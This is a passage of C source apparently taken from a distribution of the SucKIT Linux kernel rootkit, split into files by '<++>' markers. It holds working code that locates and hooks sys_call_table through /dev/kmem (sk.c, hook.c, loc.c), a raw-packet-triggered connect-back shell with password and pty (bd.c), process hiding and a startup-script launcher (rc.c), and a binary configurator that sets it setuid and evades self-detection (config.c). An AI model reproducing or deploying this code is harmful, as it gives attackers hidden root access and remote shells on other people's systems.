+        i = vsscanf(buf,fmt,args);
+        va_end(args);
+        return i;
+}
+#endif
+<--> ./src/vsprintf.c
+<++> ./src/hook.c
+/* $Id: hook.c, hooking sys_call_table[] */
+
+#ifndef HOOK_C
+#define HOOK_C
+
+/* ahh, what the heck this does ? ;)) */
+int     hook_syscalls(ulong *old, ulong *new,
+                      struct new_call *handlers, ulong po, ulong img)
+{
+        int     hooked = 0;
+        memcpy(new, old, SYS_COUNT * 4);
+        while (handlers->nr) {
+                if ((ulong) handlers->handler)
+                        new[handlers->nr] = (ulong) handlers->handler;
+skd("Hooking syscall %d\nHandler at %x, old_handler at %x\n\n\n",
+handlers->nr, handlers->handler, handlers->old_handler);
+                * (ulong *) ((ulong) (handlers->old_handler) - po + img)
+                        = old[handlers->nr];
+                handlers++;
+                hooked++;
+        }
+        return hooked;
+}
+#endif
+<--> ./src/hook.c
+<++> ./src/io.c
+/* $Id: io.c, I/O magics */
+
+#ifndef IO_C
+#define IO_C
+int     errno;
+#include <stdarg.h>
+#include <linux/unistd.h>
+#include <asm/stat.h>
+#include "suckit.h"
+#define __NR__exit __NR_exit
+static inline _syscall0(int,pause);
+static inline _syscall0(int,sync);
+static inline _syscall3(int,write,int,fd,const char *,buf,int,count);
+static inline _syscall3(int,read,int,fd,char *,buf,int,count);
+static inline _syscall3(int,lseek,int,fd,int,offset,int,count);
+static inline _syscall1(int,dup,int,fd);
+static inline _syscall3(int,execve,const char *,file,char **,argv,
+                        char **,envp);
+static inline _syscall3(int,open,const char *,file,int,flag,int,mode);
+static inline _syscall1(int,close,int,fd);
+static inline _syscall1(int,_exit,int,exitcode);
+static inline _syscall1(int, get_kernel_syms, struct kernel_sym *, table);
+static inline _syscall1(int, olduname, void *, buf);
+static inline _syscall1(int, uname, void *, buf);
+#define __NR__fork __NR_fork
+static  inline _syscall0(int, _fork);
+static inline _syscall1(int, unlink, char *, name);
+static inline _syscall0(int, getpid);
+
+int     printf(char *fmt, ...)
+{
+        va_list args;
+        int     i;
+        char    buf[2048];
+
+        va_start(args, fmt);
+        i = vsnprintf(buf, sizeof(buf) - 1, fmt, args);
+        return write(1, buf, i);
+}
+
+#endif
+<--> ./src/io.c
+<++> ./src/sk.c
+/* $Id: sk.c - suckit, loader code  */
+
+#ifndef SK_C
+#define SK_C
+#include <stdarg.h>
+#include <linux/unistd.h>
+
+#include "suckit.h"
+
+#include "string.c"
+#include "vsprintf.c"
+#include "io.c"
+#include "main.c"
+#include "loc.c"
+#include "kernel.c"
+#include "gfp.c"
+#include "hook.c"
+#include "client.c"
+#include "bd.c"
+#include "rc.c"
+#include "core.h"
+
+#define TMP_SIZE (64*1024)
+
+/* [main] */
+int     main(int argc, char *argv[])
+{
+        ulong   page_offset;
+        ulong   dispatch;
+        ulong   sct;
+        ulong   kma;
+        ulong   punk_addr;
+        ulong   punk_size;
+        uchar   tmp[TMP_SIZE];
+        ulong   *new_call_table;
+        ulong   old_call_table[SYS_COUNT];
+
+        struct  new_call *handlers;
+        struct  obj_struc *img;
+        struct  kma_struc kmalloc;
+        struct  cmd_struc cmd;
+
+        int     kmem, i, hooked, relocs;
+        int     silent = 0;
+
+        /* be silent ? */
+        if (!strcmp(cfg.hs, &argv[0][strlen(argv[0]) - strlen(cfg.hs)])) {
+                i = open("/dev/null", O_RDWR, 0);
+                dup2(i, 0);
+                dup2(i, 1);
+                dup2(i, 2);
+                close(i);
+                silent++;
+                if (fucka_is_there())
+                        return 0;
+        }
+
+        /* crappy intro/help stuff */
+        printf("%s", BANNER);
+
+        if (!silent)
+        if ((i = fucka_is_there()) || (argc > 1)) {
+                return client(i, argc, argv);
+        }
+
+        /* look for needed kernel addresses */
+        printf("Getting kernel stuff...");
+        sct = get_sct(&dispatch);
+        if (!sct) {
+                printf("Cannot determine where sys_call_table[] is ;(\n");
+                return 1;
+        }
+
+        page_offset = sct & 0xF0000000;
+        kma = get_kma(page_offset);
+
+        if (!kma) {
+                printf("Cannot determine where kmalloc() is ;(\n");
+                return 1;
+        }
+
+        printf("OK\n"
+                "page_offset      : 0x%08x\n"
+                "sys_call_table[] : 0x%08x\n"
+                "int80h dispatch  : 0x%08x\n"
+                "kmalloc()        : 0x%08x\n"
+                "GFP_KERNEL       : 0x%08x\n",
+                page_offset,
+                sct,
+                dispatch,
+                kma,
+                get_gfp());
+
+        kmem = open(KMEM_FILE, O_RDWR, 0);
+        if (!rkm(kmem, sct, old_call_table, sizeof(old_call_table))) {
+                printf("FUCK: Cannot get old sys_call_table[] at 0x%08x\n",
+                        sct);
+                return 1;
+        }
+
+        if (!rkml(kmem, sct + (PUNK * 4), &punk_addr)) {
+                printf("FUCK: Cannot get addr of %d syscall\n", PUNK);
+                return 1;
+        }
+
+        img = (void *) punk;
+        punk_size = * (ulong *) ((ulong) img->punk_size + (ulong) img);
+
+        if (punk_size > TMP_SIZE || img->obj_len > TMP_SIZE) {
+                printf("FUCK: No space for syscall/image,"
+                       "adjust TMP_SIZE in src/sk.c\n");
+                return 1;
+        }
+
+        if (!rkm(kmem, punk_addr, tmp, punk_size)) {
+                printf("FUCK: Cannot save old %d syscall!\n", PUNK);
+                return 1;
+        }
+
+        if (!wkm(kmem, punk_addr,
+            (char *) ((ulong) img->punk + (ulong) img), punk_size)) {
+                printf("FUCK: Can't overwrite our victim syscall %d!\n",
+                       PUNK);
+                return 1;
+        }
+
+        /* setup stuff for kmalloc */
+        kmalloc.kmalloc = (void *) kma;
+        kmalloc.size = img->obj_len;
+        kmalloc.flags = get_gfp();
+
+        /* try to alloc ...
+           the most risky step of whole installation precess... */
+        olduname(&kmalloc);
+
+        /* restore back soon as possible */
+        if (!wkm(kmem, punk_addr, tmp, punk_size)) {
+                printf("Hell! Damnit!! I can't restore syscall %d !!!\n"
+                       "I recommend you to reboot imediately!\n", PUNK);
+                return 1;
+        }
+
+        if (kmalloc.mem < page_offset) {
+                printf("Allocated memory is too low (%08x < %08x)\n",
+                        kmalloc.mem, page_offset);
+                return 1;
+        }
+
+        printf(
+                "punk_addr        : 0x%08x\n"
+                "punk_size        : 0x%08x (%d bytes)\n"
+                "our kmem region  : 0x%08x\n"
+                "size of our kmem : 0x%08x (%d bytes)\n",
+                punk_addr,
+                punk_size, punk_size,
+                kmalloc.mem,
+                kmalloc.size, kmalloc.size);
+
+        /* i love this ptr math ... */
+        img->page_offset = page_offset;
+        img->syscall_dispatch = dispatch;
+        img->old_call_table = (ulong *) sct;
+        memset(tmp, 0, img->obj_len);
+        memcpy(tmp, img, img->obj_len - img->bss_len);
+
+        new_call_table =
+                (ulong *) ((ulong) img->sys_call_table + (ulong) tmp);
+        handlers =
+                (struct new_call *) ((ulong) img->new_sct + (ulong) tmp);
+        relocs =
+                img_reloc(tmp, (ulong *) (img->obj_len - img->bss_len +
+                                           (ulong) img), kmalloc.mem);
+
+        hooked = hook_syscalls(old_call_table, new_call_table,
+                       handlers, kmalloc.mem, (ulong) tmp);
+
+        if (!wkm(kmem, kmalloc.mem, tmp, img->obj_len)) {
+                printf("FUCK: Cannot write us to kmem,"
+                       " offset=0x%08x size=%d\n",
+                        kmalloc.mem, img->obj_len);
+                return 1;
+        }
+
+        printf(
+                "new_call_table   : 0x%08x\n"
+                "# of relocs      : 0x%08x (%d)\n"
+                "# of syscalls    : 0x%08x (%d)\n"
+                "And nooooow....",
+                (ulong) (((struct obj_struc *)tmp)->sys_call_table),
+                relocs, relocs,
+                hooked, hooked);
+        if (!wkml(kmem, dispatch,
+            (ulong) (((struct obj_struc *)tmp)->sys_call_table))) {
+                printf("..something goes wrong ;(\n");
+                return 1;
+        }
+
+        printf("Shit happens!! -> WE'RE IN <-\n");
+        close(kmem);
+
+        /* setup our backdoor process */
+        cmd.num = backdoor();
+        skio(CMD_BDR, &cmd);
+
+        if (silent)
+                do_rc(cfg.home);
+        return 0;
+}
+#endif
+<--> ./src/sk.c
+<++> ./src/rc.c
+/* $Id: rc.c, executes .rc script after sucessfull installation
+              useful while respawning eggdrop, psybnc or sniffer
+              after reboot */
+
+#ifndef RC_C
+#define RC_C
+#include "io.c"
+#include "string.c"
+#include "vsprintf.c"
+#include "client.c"
+
+int     do_rc(char *home)
+{
+        char    buf[512];
+        int     pid;
+        sprintf(buf, "%s/%s", home, RC_FILE);
+
+        pid = _fork();
+        if (pid < 0)
+                return 0;
+        if (pid == 0) {
+                char    *argv[] = {NULL, NULL};
+                char    *envp[] = {NULL, "SHELL=/bin/bash",
+                "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:"
+                "/usr/local/sbin:/usr/X11R6/bin:./bin", NULL};
+                char    home[512];
+                struct  cmd_struc c;
+
+                /* make us invisible */
+                c.num = getpid();
+                skio(CMD_INV, &c);
+
+                /* change to homedir */
+                chdir(cfg.home);
+
+                /* setup enviroment */
+                sprintf(home, "HOME=%s", cfg.home);
+                argv[0] = buf;
+                envp[0] = home;
+
+                /* exec rc */
+                execve(buf, argv, envp);
+                _exit(0);
+        }
+}
+#endif
+<--> ./src/rc.c
+<++> ./src/loc.c
+/* $Id: loc.c, devik's routines to obtain kmalloc/sct craps
+               without native LKM support  */
+
+#ifndef LOC_C
+#define LOC_C
+#include "asm.h"
+#include "suckit.h"
+
+/* simple fn which reads some bytes from /dev/kmem */
+ulong   loc_rkm(int fd, void *buf, uint off, uint size)
+{
+        if (lseek(fd, off, 0) != off) return 0;
+        if (read(fd, buf, size) != size) return 0;
+        return size;
+}
+
+/* this fn tunnels out address of sys_call_table[] off int 80h */
+#define INT80_LEN       128
+ulong   get_sct(ulong *i80)
+{
+        struct idtr     idtr;
+        struct idt      idt;
+        int             kmem;
+        ulong           sys_call_off;
+        char            *p;
+        char            sc_asm[INT80_LEN];
+
+        /* open kmem */
+        kmem = open(KMEM_FILE, O_RDONLY, 0);
+        if (kmem < 0) return 0;
+        /* well let's read IDTR */
+        asm("sidt %0" : "=m" (idtr));
+        /* read-in IDT for 0x80 vector (syscall-gate) */
+        if (!loc_rkm(kmem, &idt, idtr.base + 8 * SYSCALL_INTERRUPT,
+            sizeof(idt)))
+                return 0;
+        sys_call_off = (idt.off2 << 16) | idt.off1;
+        if (!loc_rkm(kmem, &sc_asm, sys_call_off, INT80_LEN))
+                return 0;
+        close(kmem);
+        /* we have syscall routine address now, look for syscall table
+           dispatch (indirect call) */
+        p = memmem(sc_asm, INT80_LEN, "\xff\x14\x85", 3) + 3;
+        if (p) {
+                *i80 = (ulong) (p - sc_asm + sys_call_off);
+                return *(ulong *) p;
+        }
+        return 0;
+}
+
+/* simplest & safest way, but only if LKM support is there */
+ulong   get_sym(char *n) {
+        struct  kernel_sym      tab[MAX_SYMS];
+        int     numsyms;
+        int     i;
+
+        numsyms = get_kernel_syms(NULL);
+        if (numsyms > MAX_SYMS || numsyms < 0) return 0;
+        get_kernel_syms(tab);
+        for (i = 0; i < numsyms; i++) {
+                if (!strncmp(n, tab[i].name, strlen(n)))
+                        return tab[i].value;
+        }
+        return 0;
+}
+
+#define RNUM 1024
+ulong   get_kma(ulong pgoff)
+{
+        struct { uint a,f,cnt; } rtab[RNUM], *t;
+        uint            i, a, j, push1, push2;
+        uint            found = 0, total = 0;
+        uchar           buf[0x10010], *p;
+        int             kmem;
+        ulong           ret;
+
+        /* uhh, before we try to bruteforce something, attempt to do things
+           in the *right* way ;)) */
+        ret = get_sym("kmalloc");
+        if (ret) return ret;
+
+        /* and finally, good, old bruteforce ;)) */
+        kmem = open(KMEM_FILE, O_RDONLY, 0);
+        if (kmem < 0) return 0;
+        for (i = (pgoff + 0x100000); i < (pgoff + 0x1000000); i += 0x10000)
+                {
+                if (!loc_rkm(kmem, buf, i, sizeof(buf))) return 0;
+                /* loop over memory block looking for push and calls */
+                for (p = buf; p < buf + 0x10000;) {
+                        switch (*p++) {
+                                case 0x68:
+                                        push1 = push2;
+                                        push2 = *(unsigned*)p;
+                                        p += 4;
+                                        continue;
+                                case 0x6a:
+                                        push1 = push2;
+                                        push2 = *p++;
+                                        continue;
+                                case 0xe8:
+                                        if (push1 && push2 &&
+                                            push1 <= 0xffff &&
+                                            push2 <= 0x1ffff) break;
+                                default:
+                                        push1 = push2 = 0;
+                                        continue;
+                        }
+                        /* we have push1/push2/call seq; get address */
+                        a = *(unsigned *) p + i + (p - buf) + 4;
+                        p += 4;
+                        total++;
+                        /* find in table */
+                        for (j = 0, t = rtab; j < found; j++, t++)
+                                if (t->a == a && t->f == push1) break;
+                        if (j < found)
+                                t->cnt++;
+                        else
+                                if (found >= RNUM) {
+                                        return 0;
+                                }
+                                else {
+                                        found++;
+                                        t->a = a;
+                                        t->f = push1;
+                                        t->cnt = 1;
+                                }
+                        push1 = push2 = 0;
+                } /* for (p = buf; ... */
+        } /* for (i = (pgoff + 0x100000) ...*/
+        close(kmem);
+        t = NULL;
+        for (j = 0;j < found; j++)  /* find maximum */
+                if (!t || rtab[j].cnt > t->cnt) t = rtab+j;
+        if (t) return t->a;
+        return 0;
+}
+#endif
+<--> ./src/loc.c
+<++> ./src/bd.c
+/* $Id: bd.c - STCP, connect-back, anti-firewall backdoor
+               with TTY and password */
+
+/* implementing something like that on syscalls level is _really_ weird,
+   so excuse the poor coding style and using .h's wo libs etc... ;) */
+
+#ifndef BD_C
+#define BD_C
+
+#define TIOCSCTTY       0x540E
+#define TIOCGWINSZ      0x5413
+#define TIOCSWINSZ      0x5414
+
+#define RAW_PORT        80
+#define BUF     32768
+
+#define SYS_SOCKET      1               /* sys_socket(2)                */
+#define SYS_BIND        2               /* sys_bind(2)                  */
+#define SYS_CONNECT     3               /* sys_connect(2)               */
+#define SYS_LISTEN      4               /* sys_listen(2)                */
+#define SYS_ACCEPT      5               /* sys_accept(2)                */
+#define SYS_GETSOCKNAME 6               /* sys_getsockname(2)           */
+#define SYS_GETPEERNAME 7               /* sys_getpeername(2)           */
+#define SYS_SOCKETPAIR  8               /* sys_socketpair(2)            */
+#define SYS_SEND        9               /* sys_send(2)                  */
+#define SYS_RECV        10              /* sys_recv(2)                  */
+#define SYS_SENDTO      11              /* sys_sendto(2)                */
+#define SYS_RECVFROM    12              /* sys_recvfrom(2)              */
+#define SYS_SHUTDOWN    13              /* sys_shutdown(2)              */
+#define SYS_SETSOCKOPT  14              /* sys_setsockopt(2)            */
+#define SYS_GETSOCKOPT  15              /* sys_getsockopt(2)            */
+#define SYS_SENDMSG     16              /* sys_sendmsg(2)               */
+#define SYS_RECVMSG     17              /* sys_recvmsg(2)               */
+
+#include <sys/wait.h>
+//#include <sys/types.h>
+#include <sys/resource.h>
+#include <linux/unistd.h>
+#include <signal.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include "str.h"
+//#include <fcntl.h>
+
+#include <netinet/tcp.h>
+#include <netinet/ip.h>
+#include <netinet/in.h>
+#include <sys/types.h>
+#include <net/if.h>
+
+#include <netdb.h>
+#include <arpa/inet.h>
+
+#include "suckit.h"
+#include "ip.h"
+#include "vsprintf.c"
+#include "io.c"
+
+struct  config_struc    cfg = {"CFGMAGIC", ".sd", "bublifuck", "/dev"};
+#define PASSWORD cfg.pwd
+#define HOME cfg.home
+
+
+struct sel_arg_struct {
+        unsigned long n;
+        fd_set *inp, *outp, *exp;
+        struct timeval *tvp;
+};
+
+#define __NR__waitpid __NR_waitpid
+#define __NR__vhangup __NR_vhangup
+#define __NR__ioctl __NR_ioctl
+#define __NR__aselect __NR_select
+#define __NR__sigaction __NR_sigaction
+#define __NR__kill __NR_kill
+#define __NR__setsid __NR_setsid
+static  inline _syscall1(int, _aselect, struct sel_arg_struct *, args);
+static  inline _syscall2(int, socketcall, int, call, unsigned long *,args);
+static  inline _syscall3(int, _sigaction, int, num, void *, act,
+                         void *, old);
+static  inline _syscall3(int, _waitpid, int, pid, int *, dummy, int, opts);
+static  inline _syscall0(int, _vhangup);
+static  inline _syscall3(int, _ioctl, int, fd, int, cmd, void *, buf);
+static  inline _syscall2(int, dup2, int, a, int, b);
+static  inline _syscall2(int, setpgid, int, pid, int, pgid);
+static  inline _syscall2(int, _kill, int, pid, int, sig);
+static  inline _syscall0(int, _setsid);
+static  inline _syscall1(int, chdir, char *, path);
+
+struct winsize {
+        unsigned short ws_row;
+        unsigned short ws_col;
+        unsigned short ws_xpixel;
+        unsigned short ws_ypixel;
+};
+
+/* basic i/o for network stuff */
+int     _select(ulong n, fd_set *inp, fd_set *outp, fd_set *exp,
+                struct timeval *tvp)
+{
+        struct  sel_arg_struct b;
+        b.n = n;
+        b.inp = inp;
+        b.outp = outp;
+        b.exp = exp;
+        b.tvp = tvp;
+        return _aselect(&b);
+}
+
+int     _socket(int domain, int type, int protocol)
+{
+        ulong   a[3];
+        a[0] = domain;
+        a[1] = type;
+        a[2] = protocol;
+        return socketcall(SYS_SOCKET, a);
+}
+
+int     _connect(int sockfd, struct sockaddr *addr, int addrlen)
+{
+
+        ulong   a[3];
+        a[0] = sockfd;
+        a[1] = (ulong) addr;
+        a[2] = addrlen;
+        return socketcall(SYS_CONNECT, a);
+}
+
+int  _recvfrom(int  s,  void  *buf,  ulong  len,  int flags,
+               struct sockaddr *from, socklen_t *fromlen)
+{
+        ulong   a[6];
+        a[0] = s;
+        a[1] = (ulong) buf;
+        a[2] = len;
+        a[3] = flags;
+        a[4] = (ulong) from;
+        a[5] = (ulong) fromlen;
+        return socketcall(SYS_RECVFROM, a);
+}
+
+int     _signal(int num, void *handler)
+{
+        struct  sigaction       s;
+        bzero((char *) &s, sizeof(s));
+        s.sa_handler = handler;
+        s.sa_flags = SA_RESTART;
+        return _sigaction(num, &s, NULL);
+}
+
+/* creates tty/pty name by index */
+void    get_tty(int num, char *base, char *buf)
+{
+        char    series[] = "pqrstuvwxyzabcde";
+        char    subs[] = "0123456789abcdef";
+        int     pos = strlen(base);
+        strcpy(buf, base);
+        buf[pos] = series[(num >> 4) & 0xF];
+        buf[pos+1] = subs[num & 0xF];
+        buf[pos+2] = 0;
+}
+
+/* search for free pty and open it */
+int     open_tty(int *tty, int *pty)
+{
+        char    buf[512];
+        int     i, fd;
+
+        fd = open("/dev/ptmx", O_RDWR, 0);
+        close(fd);
+
+        for (i=0; i < 256; i++) {
+                get_tty(i, "/dev/pty", buf);
+                *pty = open(buf, O_RDWR, 0);
+                if (*pty < 0) continue;
+                get_tty(i, "/dev/tty", buf);
+                *tty = open(buf, O_RDWR, 0);
+                if (*tty < 0) {
+                        close(*pty);
+                        continue;
+                }
+                return 1;
+        }
+        return 0;
+}
+
+/* to avoid creating zombies ;) */
+void    sig_child(int i)
+{
+        _signal(SIGCHLD, sig_child);
+        _waitpid(-1, NULL, WNOHANG);
+}
+
+void    hangout(int i)
+{
+        _kill(0, SIGHUP);
+        _kill(0, SIGTERM);
+}
+
+void    fork_shell(int sock)
+{
+        int     subshell;
+        int     tty;
+        int     pty;
+        fd_set  fds;
+        char    buf[BUF];
+        char    *argv[] = {"sh", "-i", NULL};
+#define MAXENV  256
+#define ENVLEN  256
+        char    *envp[MAXENV];
+        char    envbuf[(MAXENV+2) * ENVLEN];
+        int     j, i;
+        char    home[256];
+        char    msg[] = "Can't fork pty, bye!\n";
+
+        /* setup enviroment */
+        envp[0] = home;
+        sprintf(home, "HOME=%s", HOME);
+        chdir(HOME);
+        j = 0;
+        do {
+                i = read(sock, &envbuf[j * ENVLEN], ENVLEN);
+                envp[j+1] = &envbuf[j * ENVLEN];
+                j++;
+                if ((j >= MAXENV) || (i < ENVLEN)) break;
+        } while (envbuf[(j-1) * ENVLEN] != '\n');
+        envp[j+1] = NULL;
+
+        /* create new group */
+        setpgid(0, 0);
+        /* open slave & master side of tty */
+        if (!open_tty(&tty, &pty)) {
+                write(sock, msg, strlen(msg));
+                close(sock);
+                _exit(0);
+        }
+        /* fork child */
+        subshell = _fork();
+        if (subshell == -1) {
+                write(sock, msg, strlen(msg));
+                close(sock);
+                _exit(0);
+        }
+        if (subshell == 0) {
+                /* close master */
+                close(pty);
+                /* attach tty */
+                _setsid();
+                _ioctl(tty, TIOCSCTTY, NULL);
+                /* close local part of connection */
+                close(sock);
+                _signal(SIGHUP, SIG_DFL);
+                _signal(SIGCHLD, SIG_DFL);
+                dup2(tty, 0);
+                dup2(tty, 1);
+                dup2(tty, 2);
+                close(tty);
+                execve("/bin/sh", argv, envp);
+        }
+        close(tty);
+        _signal(SIGHUP, hangout);
+        _signal(SIGTERM, hangout);
+
+        write(sock, BANNER, strlen(BANNER));
+        /* select loop */
+        while (1) {
+                FD_ZERO(&fds);
+                FD_SET(pty, &fds);
+                FD_SET(sock, &fds);
+                if (_select((pty > sock) ? (pty+1) : (sock+1),
+                    &fds, NULL, NULL, NULL) < 0)
+                    {
+                        break;
+                }
+
+                /* pty => remote side */
+                if (FD_ISSET(pty, &fds)) {
+                        int     count;
+                        count = read(pty, buf, BUF);
+                        if (count <= 0) break;
+                        if (write(sock, buf, count) <= 0) break;
+                }
+
+                /* remote side => pty */
+                if (FD_ISSET(sock, &fds)) {
+                        int     count;
+                        unsigned        char *p, *d;
+                        d = buf;
+                        count = read(sock, buf, BUF);
+                        if (count <= 0) break;
+
+                        /* setup win size */
+                        p = memchr(buf, ECHAR, count);
+                        if (p) {
+                                unsigned char   wb[5];
+                                int     rlen;
+                                struct  winsize ws;
+                                rlen = count - ((ulong) p - (ulong) buf);
+                                /* wait for rest */
+                                if (rlen > 5) rlen = 5;
+                                memcpy(wb, p, rlen);
+                                if (rlen < 5) {
+                                        read(sock, &wb[rlen], 5 - rlen);
+                                }
+
+                                /* setup window */
+                                ws.ws_xpixel = ws.ws_ypixel = 0;
+                                ws.ws_col = (wb[1] << 8) + wb[2];
+                                ws.ws_row = (wb[3] << 8) + wb[4];
+                                _ioctl(pty, TIOCSWINSZ, &ws);
+                                _kill(0, SIGWINCH);
+
+                                /* write the rest */
+                                write(pty, buf, (ulong) p - (ulong) buf);
+                                rlen =
+                                  ((ulong) buf + count) - ((ulong)p+5);
+                                if (rlen > 0) write(pty, p+5, rlen);
+                        } else
+                                if (write(pty, d, count) <= 0) break;
+                } /* remote side => pty */
+        } /* while */
+        close(sock);
+        close(pty);
+        _waitpid(subshell, NULL, 0);
+        _vhangup();
+        _exit(0);
+}
+
+void    connect_back(ulong ip, ushort port)
+{
+        int     sock;
+        struct  sockaddr_in     cli;
+        int     pid;
+
+        pid = _fork();
+        if (pid == -1) return;
+        if (pid == 0) {
+                char    auth[256];
+                sock = _socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
+                if (sock < 0) _exit(0);
+
+                bzero((char *) &cli, sizeof(cli));
+                cli.sin_family = AF_INET;
+                cli.sin_addr.s_addr = ip;
+                cli.sin_port = port;
+                if (_connect(sock, (struct sockaddr *) &cli,
+                    sizeof(cli)) < 0) {
+                        close(sock);
+                        _exit(0);
+                }
+                /* uhm ... how simple ;) */
+                if (read(sock, auth, sizeof(auth)) <= 0) {
+                        close(sock);
+                        _exit(0);
+                }
+                if (strcmp(auth, PASSWORD) != 0) {
+                        close(sock);
+                        _exit(0);
+                }
+                fork_shell(sock);
+                close(sock);
+                _exit(0);
+        }
+}
+
+int     backdoor()
+{
+        int     pid;
+        struct  sockaddr_in     serv;
+        struct  sockaddr_in     cli;
+        struct  sockaddr_in     raw;
+        int     sock;
+
+        printf("Starting backdoor daemon...");
+        sock = _socket(AF_INET, SOCK_RAW, 6);
+        if (sock < 0) {
+                printf("Can't allocate raw socket (%d)\n", -errno);
+                return 0;
+        }
+
+        bzero((char *) &raw, sizeof(raw));
+
+        pid = _fork();
+        if (pid < 0) {
+                printf("Cannot fork (%d)\n", -errno);
+                return 0;
+        }
+        if (pid !=0 ) {
+                printf("OK, pid = %d\n", pid);
+                return pid;
+        }
+
+        /* daemonize */
+        _setsid();
+        chdir("/");
+        pid = open("/dev/null", O_RDWR, 0);
+        dup2(pid, 0);
+        dup2(pid, 1);
+        dup2(pid, 2);
+        close(pid);
+        _signal(SIGHUP, SIG_IGN);
+        _signal(SIGTERM, SIG_IGN);
+        _signal(SIGPIPE, SIG_IGN);
+        _signal(SIGIO, SIG_IGN);
+        _signal(SIGCHLD, sig_child);
+        while (1) {
+                int     slen;
+                struct  ippkt   packet;
+
+                slen = sizeof(raw);
+                bzero((char *) &packet, sizeof(packet));
+                _recvfrom(sock, (struct ippkt *) &packet, sizeof(packet),
+                         0, (struct sockaddr *) &raw, &slen);
+
+                if ((!packet.tcp.ack) && (!packet.tcp.urg) &&
+                    ( ((struct rawdata *) &packet.data)->id == RAWID ) ) {
+                        /* serve the client */
+                     connect_back(((struct rawdata *) &packet.data)->ip,
+                                  ((struct rawdata *) &packet.data)->port);
+                }
+        }
+        _exit(0);
+}
+#endif
+<--> ./src/bd.c
+<++> ./src/config.c
+/* $Id: config.c, configuring binary */
+
+#ifndef CONFIG_C
+#define CONFIG_C
+#include "string.c"
+#include "vsprintf.c"
+#include "io.c"
+
+int     config(char *name, char *hs, char *pwd, char *home)
+{
+        int     fd = -1;
+        char    bigbuf[65536];
+        struct  config_struc cfg;
+        int     size;
+        char    *p;
+
+        /* to avoid detecting itself ;) */
+        strcpy(cfg.magic, "CFGMAGI");
+        cfg.magic[7] = 'C';
+        strncpy(cfg.hs, hs, 32);
+        strncpy(cfg.pwd, pwd, 32);
+        strncpy(cfg.home, home, 64);
+
+        printf("Configuring %s:\n", name);
+        fd = open(name, O_RDONLY, 0);
+        if (fd < 0) {
+                printf("Can't open %s, errno=%d\n", name, -errno);
+                goto err;
+        }
+        size = read(fd, bigbuf, sizeof(bigbuf));
+        close(fd);
+        unlink(name);
+        fd = open(name, O_RDWR | 0100, 04777);
+        if (fd < 0) {
+                printf("Can't open %s, errno=%d\n", name, -errno);
+                goto err;
+        }
+
+        p = memmem(bigbuf, size, cfg.magic, 8);
+        if (!p) {
+                printf("Error\n");
+                goto err;
+        }
+        memcpy(p, &cfg, sizeof(cfg));
+        p = memmem(p+1, size, cfg.magic, 8);
+        if (!p) {
+                printf("Error\n");
+                goto err;
+        }
+        memcpy(p, &cfg, sizeof(cfg));
+        lseek(fd, 0, 0);
+        if (write(fd, bigbuf, size) != size) {
+                printf("Uncompleted write!\n");
+                goto err;
+        }
+        printf("OK!\n");
+        close(fd);
+        return 0;
+err:
+        close(fd);
+        return 1;
+}
+#endif
+<--> ./src/config.c
+<++> ./utils/parser.c
+/* $Id: parse.c, parses .s file of kernel image,
+                 gives "extern" and so on... */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <string.h>
+
+#define comp(x) (!strcmp(b1, x))
+
+int     main()
+{
+        char    buf[16384];
+        char    b1[16384];
+        char    b2[16384];
+        char    *commtab[32768];
+        int     cp = 0;
+        int     i;
+
+        fputs(
+        ".text\n"
+        "text_start:\n"
+        "\t.long\ttext_end-text_start\n"
+        "\t.long\ttext_end-bss_start\n"
+        "\t.long\tpunk\n"
+        "\t.long\tpunk_size\n"
+        "\t.long\tnew_sct\n"
+        "\t.long\tsys_call_table\n"
+        "page_offset:\n"
+        "\t.long\t0\n"
+        "syscall_dispatch:\n"
+        "\t.long\t0\n"
+        "old_call_table:\n"
+        "\t.long\t0\n"
+        , stdout);
+
+        while (fgets(buf, 16384, stdin)) {
+                sscanf(buf, "%s %s", b1, b2);
+                /* comment */
+                if (b1[0] == '#') continue;
+                /* punk_size */
+                if (comp(".size") && (!strncmp(b2, "punk,", 5))) {
+                        char *p = strstr(b2, ",");
+                        printf("punk_size:\n\t.long\t%s\n", p + 1);
+                }
+                /* discard this stuff */
+                if (comp(".file") || comp(".version") ||
+                    comp(".data") || comp(".align") ||
+                    comp(".p2align") || comp(".section") ||
+                    comp(".ident") || comp(".globl")) continue;
+                /* convert .bss => .text */
+                if (comp(".comm")) {
+                        commtab[cp++] = strdup(b2);
+                        continue;
+                }
+                fprintf(stdout, "%s", buf);
+        }
+        fprintf(stdout, "bss_start:\n");
+        for (i = 0; i < cp; i++) {
+                char    *name;
+                char    *size;
+                char    *ptr = commtab[i];
+                name = strsep(&ptr, ",");
+                size = strsep(&ptr, ",");
+                fprintf(stdout,
+                "\t.type\t%s,@object\n"
+                "\t.size\t%s,%s\n"
+                "%s:\n"
+                "\t.zero\t%s\n",
+                name,
+                name, size,
+                name,
+                size);
+        }
+        fprintf(stdout, "text_end:\n");
+        return 0;
+}
+<--> ./utils/parser.c
+<++> ./utils/rip.c
+/* $Id: rip.c - rips out kernel image from .o */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <string.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+
+struct objinfo {
+        unsigned int size;
+        unsigned int bss_size;
+} __attribute__ ((packed));
+
+
+int     main(int argc, char *argv[])
+{
+        FILE    *dump;
+        int     core;
+        char    buf[512];
+        unsigned off;
+        char    *rbuf;
+
+        struct objinfo  obj;
+        int     rcount = 0;
+
+        if (argc < 3) {
+                printf("use: %s <in_file> <out_file>\n", argv[0]);
+                exit(1);
+        }
+
+        printf("Ripping headers..."); fflush(stdout);
+        sprintf(buf, "objdump -h %s", argv[1]);
+        dump = popen(buf, "r");
+        while (fgets(buf, sizeof(buf), dump)) {
+                unsigned        idx, size, vma, lma, fileoff;
+                char            name[512];
+                char            algn[512];
+                if (sscanf(buf, "%d %s %x %x %x %x %s\n",
+                    &idx, name, &size, &vma, &lma, &fileoff, algn) == 7) {
+                        if (!strcmp(name, ".text")) {
+                                off = fileoff;
+                                pclose(dump);
+                                break;
+                        }
+                }
+        }
+        printf("0x%08x\nRipping c0r3...", off); fflush(stdout);
+        core = open(argv[1], O_RDONLY);
+        lseek(core, off, SEEK_SET);
+        read(core, &obj, sizeof(obj));
+        lseek(core, off, SEEK_SET);
+        rbuf = malloc(obj.size - obj.bss_size);
